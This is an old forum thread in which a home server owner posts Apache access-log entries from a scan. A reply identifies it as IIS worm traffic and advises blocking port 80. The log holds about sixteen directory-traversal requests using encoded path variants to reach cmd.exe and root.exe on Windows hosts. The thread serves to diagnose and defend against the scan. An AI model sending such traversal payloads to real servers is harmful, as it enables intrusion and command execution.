Stats and such down.

MikeJ · Post by **MikeJ** » Sun Mar 24, 2002 10:03 am

i had a recent h4x attack on my apache server. I would paste the access log but when i removed apache i lost the log. It was someone making some very fishy GET request to various Windows services (including the command line) not in my http docs folder. Being the overly cautious freak i am, i blocked port forwarding to port 80 on my router and took down my httpd indefinately. I can still do stats i suppose but i'll have to upload them...

The IP seems to be a pacbell DSL user. Its the same subnet host fagpot (previous h4x0r of ;0 channel) has, but i checked its not him.

*** Looking up 64.166.157.125

-

*** Resolved 64.166.157.125 to adsl-64-166-157-125.dsl.snfc21.pacbell.net

I'm probably over reacting but better safe than sorry. I don't think my system was compromised.

Lythium · Post by **Lythium** » Mon Mar 25, 2002 4:33 pm

lol.. dood, thats code red still in effect. all of my apache server logs are flooded with the cmd.exe and vti_private requests. It is nothing to worry about and does not affect apache. They are coming from a pac bell user cause the worm works attacks its local subnet. It gets spread to other subnets because people who visit an iis powered site spread it to the next iis powered site they goto. You have no worries of hax, if you want to cut out most of the spammed logs, block port 80 from everyone in your subnet.

Or if you would like I will donate shell space on irc.semicolon-zero.com for you to update.

nemo · Post by **nemo** » Mon Mar 25, 2002 5:19 pm

Group: admin

Posts: 133

Joined: Feb. 2002

congrats

MikeJ · Post by **MikeJ** » Tue Mar 26, 2002 1:03 am

Group: admin
Posts: 133

Joined: Feb. 2002

congrats

:confused:

MikeJ · Post by **MikeJ** » Tue Mar 26, 2002 1:10 am

64.166.157.125 - - [24/Mar/2002:01:08:58 -0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 281
64.166.157.125 - - [24/Mar/2002:01:08:59 -0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 279

64.166.157.125 - - [24/Mar/2002:01:09:03 -0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289

64.166.157.125 - - [24/Mar/2002:01:09:07 -0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289

64.166.157.125 - - [24/Mar/2002:01:09:08 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303

64.166.157.125 - - [24/Mar/2002:01:09:08 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320

64.166.157.125 - - [24/Mar/2002:01:09:58 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320

64.166.157.125 - - [24/Mar/2002:01:10:08 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 336

64.166.157.125 - - [24/Mar/2002:01:10:19 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302

64.166.157.125 - - [24/Mar/2002:01:10:19 -0800] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302

64.166.157.125 - - [24/Mar/2002:01:10:23 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302

64.166.157.125 - - [24/Mar/2002:01:10:23 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302

64.166.157.125 - - [24/Mar/2002:01:10:24 -0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286

64.166.157.125 - - [24/Mar/2002:01:10:24 -0800] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286

64.166.157.125 - - [24/Mar/2002:01:10:25 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303

64.166.157.125 - - [24/Mar/2002:01:10:25 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303

Well thanks for the tips lyth, stats will be back up ASAP ?:D

Lythium · Post by **Lythium** » Thu Mar 28, 2002 11:15 pm

block port 80 from 64.166.157.* and it'll almost be completely stopped

JFK · Post by **JFK** » Fri Mar 29, 2002 1:20 am

kick his ass seabass